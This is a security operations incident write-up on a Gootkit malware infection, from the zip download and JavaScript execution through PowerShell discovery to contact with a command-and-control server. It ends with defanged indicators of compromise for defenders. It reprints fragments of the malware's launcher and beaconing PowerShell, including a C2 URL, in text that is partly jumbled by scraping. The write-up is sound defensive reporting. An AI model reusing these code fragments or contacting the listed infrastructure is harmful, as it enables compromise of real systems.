Gootkit Malware Exploit
Expert: Sam B
Role: SOC Analyst
Specialises in: Security Operations
Recently, at Stripe OLT, our team encountered a Gootkit malware exploit in one of our clients’ systems. Gootkit, while not as widely recognised as some other malware families, has evolved from a simple trojan into a complex tool that delivers various malicious payloads, exploits vulnerabilities, and gains unauthorised access to data.
The process below will walk you through our experience with this specific Gootkit exploit, from the initial detection to how we ultimately isolated the risk. It’s a straightforward look at how we handled this situation, in the hope that readers can gain insight into the risks associated with downloaded malware.
Incident Prevention Walkthrough
Incident Walkthrough
Enter our End User
File Created
Internationaldepositnettingagreement_0121.zip
C\Users\user@example.com\DownloadsPotential Prevention
User File Execution
.zip file, our user runs the JavaScript contained.8965.jsJavascript Execution
Registry Value Set and modified.
C:\Windows\System32\ WScript.exe.FriendlyAppName‘location selection’. This scheduled task utilises the executable ITERAT~.JS.IHost.Sleep("11111")IHost.FullName()IHost.ScriptFullNameIHost.CreateObject("shell.APPlicaTion"IShellDispatch6.ShellExecute("cscript.exe", ""ITERAT~1.JS"", ""C:\Users\User", "oPEn", "0");ITERAT~1.JS using ‘cscript.exe’.Triggering Powershell scripts
{$_.nAMe}‘name’ object from the current pipeline. Used in conjunction with ‘get-process’ it would extract the name of each process.{$_.mAinwindowTITLe}MainWindowTitle property of each process, which is the title of the main window associated with that process.{$_.nAME+"^"+$_.MaInwIndowTITle}‘name’ and ‘MainWindowTitle’ properties for each process found.{$_.FrEE -gT 50000}SELECT * FROM Win32_LogicalDisk WHERE DeviceId='H:'H: drive category to select.‘whoami’More chances to prevent
Further System Discovery
‘$isLocalAdmin’ value is "1", it constructs a string ‘$u6’ with the value "ADA3EA8A0D". Using GET and POST requests, the compromised endpoint used a HTTPS implant to communicate with their attacker-controlled command and control service.(Security.Principal.WindowsPrincipal)
([Security.Principal.WindowsIdentity]::
((GetCurrent))
())).IsInRole([Security.Principal.WindowsBuiltinRole]::(Administrator))) {
$isLocalAdmin = “1”
} else {
$isLocalAdmin = “0”
};
$splitString = ADA3EA8A0D;
$g8 = new-object ($w[30]);
function r3($a4) { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; [Net.ServicePointManager]::ServerCertificateValidationCallback = { $true };
$c9 = ($w[46]);
$r1 = 30000;
$c8 = (hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php);
$u6 = “ADA3EA8A0D=$($isLocalAdmin)”;
if ($g8.(Count) -ne 0) {
$u6 = “$u6!” + ($g8 -join “|”)
End user Behaviour Trigger
SOC Intervention
DO NOT NAVIGATE TO THE LISTED ENTITES.
If you’re a security or IT practitioner, use these to harden your environment against this exploit!
hxxps[://]www.bing[.]com[/]search?q=International+Deposit+Netting+Agreement&cvid=e3b01e2049004d85a49beeaadb8e535d&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQRRj8VdIBBzc2N2owajmoAgCwAgA&PC=U531&FPIG=51FDC77EC18F4C9B9437A85F1B616802&first=21&FORM=PERE[1]
Initial Redirect Domain
thirstymag[.]com
Compromised Domain
thirstymag[.]com/blog[.]php
18[.]209[.]242[.]38
Downloaded .zip
International_deposit_netting_agreement_62671.zip
Hash
1acc0ccc9b45a61bf5e72de4b4d498f6ffbf6d5feb765564a8d51b5ec88b9bb6
Initial Java Script
international deposit netting agreement 37722.js
Hash
f19e3772bad5d660cedffec7a71ffb360ed7e4f7f375d365ca8023629ccb6d63
Scheduled Task Script
ITERAT~1.JS
Hash
b0f6225aee8447d64fd522f2e2cb625a07f91f38c89217796c621d2d1cbd5143
Path
C:\Users\user@domain.com\AppData\Roaming\’discovered resource’
URLs / Domains
hxxps[:]//ewaprzyjazna[.]pl/xmlrpc[.]php
IP: 109[.]237[.]140[.]52 (IpV4):443, alfa3207[.]alfahosting-server[.]de
(pflege-expert[.]de)
IP: 91[.]203[.]110[.]217 (IpV4):443, host217[.]checkdomain[.]de (videogamecast[.]de)
IP: 104[.]21[.]69[.]96 (IpV4):443, Cloudflare[.]com (freevpn[.]me)
IP: 172[.]67[.]206[.]248 (IpV4):443, Cloudflare[.]com
rainbownourishment[.]com)
IP: 185[.]251[.]11[.]73 (IpV4):80, gmessaging[.]net
IP: 103[.]1[.]208[.]220 (IpV4):443, hl-lw10[.]viettelidc[.]com[.]vn
nlx[.]com[.]vm)
IP: 2[.]57[.]138[.]160 (IpV4):443, s35[.]zenbox[.]pl (znadplanszy[.]pl)
IP: 172[.]67[.]130[.]23 (IpV4):443, Cloudflare[.]com (sawahegy[.]com) IP: 104[.]21[.]7[.]97 (IpV4):443, Cloudflare[.]com
(sawahegy[.]com)










